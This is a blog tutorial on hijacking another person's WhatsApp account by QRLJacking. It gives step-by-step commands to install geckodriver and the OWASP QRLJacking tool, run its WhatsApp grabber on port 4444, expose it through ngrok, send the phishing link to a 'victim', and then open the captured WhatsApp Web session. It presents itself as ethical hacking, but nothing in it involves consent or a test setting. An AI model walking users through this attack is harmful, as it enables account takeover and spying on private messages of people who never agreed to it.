Ticker

6/recent/ticker-posts

QRL Jacking | Make Access On Anyone WhatsApp Without Touch | 2022 Working


The most asked question to me from newbies in hacking is "How To Hack Whatsapp Without Touching a Victim's Device", So today I show you how actually hacker/attacker makes access to a victim's account without even touching or asking for any OTP from a victim just using social engineering technique.

Before diving into this information let me clear one thing so it's easy to understand what we are going to do. Whatsapp has end-to-end encryption so it's near to impossible to directly spy or read victim Whatsapp messages, different methods are used in different conditions and situations like MacSpoofing, OTP Phishing, SS7, and some others. 

QRLJacking

In this article, I'll show you a method known as QRLJacking in which the attacker/hacker sends a malicious link to the target device and make them scan their QR code of WhatsApp, so the attacker/hacker is able to catch the WhatsApp web session in which they can read/spy or respond messages.

Requirements

  • Linux/macOS (Linux Recommended)
  • Firefox Latest Version
  • Python 3.7+
I am going to show a Linux tutorial in this article. 

Steps

  • First of all, you have to download the driver for firefox and setup in your Linux system using the commands given below:
tar -xvf <-type-geckodriver-tar-package-name->
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
  • Now download and set up the QRLJacking tool given commands
git clone https://github.com/OWASP/QRLJacking
cd QRLJacking/QRLJacker
pip install -r requirements.txt
python3 QrlJacker.py

Now the QRLJacker interface opens on your Terminal as shown in the image.

Now we are ready to perform vector QR Jacking attack, type given commands:
use grabber/whatsapp
set port 4444
run
I am testing this tool on my localhost (You can do port forwarding for out-of-LAN devices and I recommend using ngrok for it) so my port is 4444 and the host is 0.0.0.0 in this tutorial. So in my case, the QR code link is 0.0.0.0:4444.

Now send that link to the victim and once the victim scanned their WhatsApp web QR code, the hacker/attacker gets a session saved on this tool to later access a WhatsApp Web session.
  • Press Ctrl +C to intercept the QRJacker tool and type the commands given below:
sessions
  • Now the list of saved sessions is shown on your Terminal (In my case "0")
sessions -i 0
Now wait a few seconds and Firefox automatically launched and you get a WhatsApp web session of the victim as shown in the image given below.

I hope this information is helpful to you and if you still face any problems or errors then feel free to reach me. If you want to learn complete Ethical Hacking from scratch level then try our "Hacking Like Watch Dogs" course and start your journey today. Thanks for reading, until next time.